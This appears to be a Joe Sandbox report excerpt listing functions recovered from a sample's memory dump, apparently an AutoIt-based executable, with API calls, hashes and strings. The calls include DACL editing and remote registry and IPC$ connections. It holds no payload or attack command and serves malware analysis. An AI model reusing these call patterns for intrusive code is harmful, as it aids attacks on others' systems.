                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                        • API String ID: 984253442-2268648507
                                                                                                                        • Opcode ID: 947a017e633bed1c5be5420ad29e7c744d36f2e1db84efba2fe37a0003503533
                                                                                                                        • Instruction ID: 5bd13102d99bbc263b6a42bb48f48e045f100b276e76bc90119ae54811b8069a
                                                                                                                        • Opcode Fuzzy Hash: 947a017e633bed1c5be5420ad29e7c744d36f2e1db84efba2fe37a0003503533
                                                                                                                        • Instruction Fuzzy Hash: D4413D72904209BACF15FBA1DD96EEEB778EF14741F100066F201B21A2EA656F08CB71
                                                                                                                        APIs
                                                                                                                        • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00DDD96C
                                                                                                                        • __swprintf.LIBCMT ref: 00DDD98E
                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD9CB
                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DDD9F0
                                                                                                                        • _memset.LIBCMT ref: 00DDDA0F
                                                                                                                        • _wcsncpy.LIBCMT ref: 00DDDA4B
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00DDDA80
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00DDDA8B
                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00DDDA94
                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00DDDA9E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                        • API String ID: 2733774712-3457252023
                                                                                                                        • Opcode ID: c4e742e2987fbd71daf64ba9d5bd4cc50686afa252719f0b941dfe06c49ee91e
                                                                                                                        • Instruction ID: d98dc05899185a9de1cfff24afca774742094a52f8f976bf21da9ac5020cb4b6
                                                                                                                        • Opcode Fuzzy Hash: c4e742e2987fbd71daf64ba9d5bd4cc50686afa252719f0b941dfe06c49ee91e
                                                                                                                        • Instruction Fuzzy Hash: C2319276A00208AEDF20DFA5DC49FDA77BDEF88700F14C1A6F559E2160E7709A458BB1
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DFBD04,?,?), ref: 00DFE564
                                                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE57B
                                                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE586
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE593
                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00DFE59C
                                                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE5AB
                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 00DFE5B4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE5BB
                                                                                                                        • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DFE5CC
                                                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E1D9BC,?), ref: 00DFE5E5
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00DFE5F5
                                                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00DFE619
                                                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00DFE644
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00DFE66C
                                                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DFE682
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3840717409-0
                                                                                                                        • Opcode ID: 4fc53f9a6e4e0342534f14600ddca645df572d27a06b3ada601d371e337e2031
                                                                                                                        • Instruction ID: 8cb5ff4a477fe4f28699860663e9982d632ea56514984efa3431390b9a021de4
                                                                                                                        • Opcode Fuzzy Hash: 4fc53f9a6e4e0342534f14600ddca645df572d27a06b3ada601d371e337e2031
                                                                                                                        • Instruction Fuzzy Hash: 20416875604218BFDB119F66DC88EAEBBB9EF89715F10C058FA16E7260D730AD44CB20
                                                                                                                        APIs
                                                                                                                        • __wsplitpath.LIBCMT ref: 00DE0C93
                                                                                                                        • _wcscat.LIBCMT ref: 00DE0CAB
                                                                                                                        • _wcscat.LIBCMT ref: 00DE0CBD
                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DE0CD2
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0CE6
                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 00DE0CFE
                                                                                                                        • SetFileAttributesW.KERNEL32(?,00000000), ref: 00DE0D18
                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0D2A
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                                                                        • String ID: *.*
                                                                                                                        • API String ID: 34673085-438819550
                                                                                                                        • Opcode ID: 5e86f0ec40935f3dd07214e080e8bfd5df5c9d8868bd3e16016a0476bab84f2a
                                                                                                                        • Instruction ID: f779b0683f3ae107b22598da921750230f1e29542da83faf7551946dcdfc3748
                                                                                                                        • Opcode Fuzzy Hash: 5e86f0ec40935f3dd07214e080e8bfd5df5c9d8868bd3e16016a0476bab84f2a
                                                                                                                        • Instruction Fuzzy Hash: D38194715043859FCB24EF65C8449AABBE8FB88314F28892AF885D7251E774DDC4CB72
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DCB903
                                                                                                                          • Part of subcall function 00DCB8E7: GetLastError.KERNEL32(?,00DCB3CB,?,?,?), ref: 00DCB90D
                                                                                                                          • Part of subcall function 00DCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DCB3CB,?,?,?), ref: 00DCB91C
                                                                                                                          • Part of subcall function 00DCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DCB3CB), ref: 00DCB923
                                                                                                                          • Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DCB93A
                                                                                                                          • Part of subcall function 00DCB982: GetProcessHeap.KERNEL32(00000008,00DCB3E1,00000000,00000000,?,00DCB3E1,?), ref: 00DCB98E
                                                                                                                          • Part of subcall function 00DCB982: RtlAllocateHeap.NTDLL(00000000,?,00DCB3E1), ref: 00DCB995
                                                                                                                          • Part of subcall function 00DCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DCB3E1,?), ref: 00DCB9A6
                                                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DCB5F7
                                                                                                                        • _memset.LIBCMT ref: 00DCB60C
                                                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DCB62B
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00DCB63C
                                                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00DCB679
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DCB695
                                                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00DCB6B2
                                                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DCB6C1
                                                                                                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00DCB6C8
                                                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DCB6E9
                                                                                                                        • CopySid.ADVAPI32(00000000), ref: 00DCB6F0
                                                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DCB721
                                                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DCB747
                                                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DCB75B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2347767575-0
                                                                                                                        • Opcode ID: c446929d588ff8e1700cf4f210441c50715460945d8b64a9b5c96fcb9d198c40
                                                                                                                        • Instruction ID: 4496cd0617d9196c8c4e5a9a68e8b10d36de322979b883c88d8010d61ae3419c
                                                                                                                        • Opcode Fuzzy Hash: c446929d588ff8e1700cf4f210441c50715460945d8b64a9b5c96fcb9d198c40
                                                                                                                        • Instruction Fuzzy Hash: A6514D7590020AAFDF009FA5DC46EEEBB79FF44364F04815EE915A7290DB35DA05CB60
                                                                                                                        APIs
                                                                                                                        • GetDC.USER32(00000000), ref: 00DEA2DD
                                                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DEA2E9
                                                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00DEA2F5
                                                                                                                        • SelectObject.GDI32(00000000,?), ref: 00DEA302
                                                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DEA356
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00DEA392
                                                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DEA3B6
                                                                                                                        • SelectObject.GDI32(00000006,?), ref: 00DEA3BE
                                                                                                                        • DeleteObject.GDI32(?), ref: 00DEA3C7
                                                                                                                        • DeleteDC.GDI32(00000006), ref: 00DEA3CE
                                                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00DEA3D9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                        • String ID: (
                                                                                                                        • API String ID: 2598888154-3887548279
                                                                                                                        • Opcode ID: 4ae4de0fe5c64689159ff8ae79bc916d1e978af4ba512b8b2f8d12a4a18302e2
                                                                                                                        • Instruction ID: b5221a8a1e39e6547e1bb0579a80fd60e02ad24e255e4035b9abccfa6b4df542
                                                                                                                        • Opcode Fuzzy Hash: 4ae4de0fe5c64689159ff8ae79bc916d1e978af4ba512b8b2f8d12a4a18302e2
                                                                                                                        • Instruction Fuzzy Hash: D9515875A04349EFCB15DFA9CC84EAEBBB9EF48310F14841DF99AA7210C731A845CB60
                                                                                                                        APIs
                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BuffCharUpper
                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E
                                                                                                                        • API String ID: 3964851224-875377453
                                                                                                                        • Opcode ID: 67c5b69318e20228c06c6f18f7ee42b4702958fd4dffff13c44e19e617393683
                                                                                                                        • Instruction ID: da399d32f214aea309d162af122cebd072be103cde13683772d8aed1f3a32b06
                                                                                                                        • Opcode Fuzzy Hash: 67c5b69318e20228c06c6f18f7ee42b4702958fd4dffff13c44e19e617393683
                                                                                                                        • Instruction Fuzzy Hash: D6417EB420034A8BCF04EF54E841BFA3361EF56390F1B8864ED916B295DB34DA59CB70
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E03C64,00000010,00000000,Bad directive syntax error,00E2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00DD32D1
                                                                                                                        • LoadStringW.USER32(00000000,?,00E03C64,00000010), ref: 00DD32D8
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • _wprintf.LIBCMT ref: 00DD3309
                                                                                                                        • __swprintf.LIBCMT ref: 00DD332B
                                                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD3395
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"
                                                                                                                        • API String ID: 1506413516-3476811254
                                                                                                                        • Opcode ID: 2c30e71f848d550904dcccf0ab461260c910735dab9b67822b7c1ac84281cfdf
                                                                                                                        • Instruction ID: 445983abd4076e50066f98cd730b8fa125fa714cff89942014e5804b20f53abd
                                                                                                                        • Opcode Fuzzy Hash: 2c30e71f848d550904dcccf0ab461260c910735dab9b67822b7c1ac84281cfdf
                                                                                                                        • Instruction Fuzzy Hash: 2C21283284421AFBCF12AF90DC0AEEE7779FF14700F004456B516B10A2EA75AA58DB71
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF), ref: 00DDD567
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00DDD589
                                                                                                                        • __swprintf.LIBCMT ref: 00DDD5DC
                                                                                                                        • _wprintf.LIBCMT ref: 00DDD68D
                                                                                                                        • _wprintf.LIBCMT ref: 00DDD6AB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                        • Opcode ID: a651c53deffff426a8c065c9039896435eea4926b0c27d40f71b0f558a7cccc7
                                                                                                                        • Instruction ID: 4e38278c59af08a295ba520248a9be2215d9cdcec6d35c85baf2a831dbc5bbf4
                                                                                                                        • Opcode Fuzzy Hash: a651c53deffff426a8c065c9039896435eea4926b0c27d40f71b0f558a7cccc7
                                                                                                                        • Instruction Fuzzy Hash: 7C516D72904209BACF15EBA0DD42EEEB779EF14700F104566F105B21A1EA71AF58DBB1
                                                                                                                        APIs
                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00DDD37F
                                                                                                                          • Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F
                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DDD3A0
                                                                                                                        • __swprintf.LIBCMT ref: 00DDD3F3
                                                                                                                        • _wprintf.LIBCMT ref: 00DDD499
                                                                                                                        • _wprintf.LIBCMT ref: 00DDD4B7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                        • Opcode ID: b0ab77424aed9ae6156efe30da67a3933f1aaa408faf3a06133b73fbc469590f
                                                                                                                        • Instruction ID: 12aa3380ca77f65aeee33a2bcb66f052449a552aa177507fe0a4b57730cbd418
                                                                                                                        • Opcode Fuzzy Hash: b0ab77424aed9ae6156efe30da67a3933f1aaa408faf3a06133b73fbc469590f
                                                                                                                        • Instruction Fuzzy Hash: 98519C72900209BACF15EBE0ED82EEEB779EF14700F108566F105B21A1EA756F58DB71
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9
                                                                                                                        • _memset.LIBCMT ref: 00DCAF74
                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00DCAFA9
                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00DCAFC5
                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00DCAFE1
                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00DCB00B
                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 00DCB033
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DCB03E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00DCB043
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
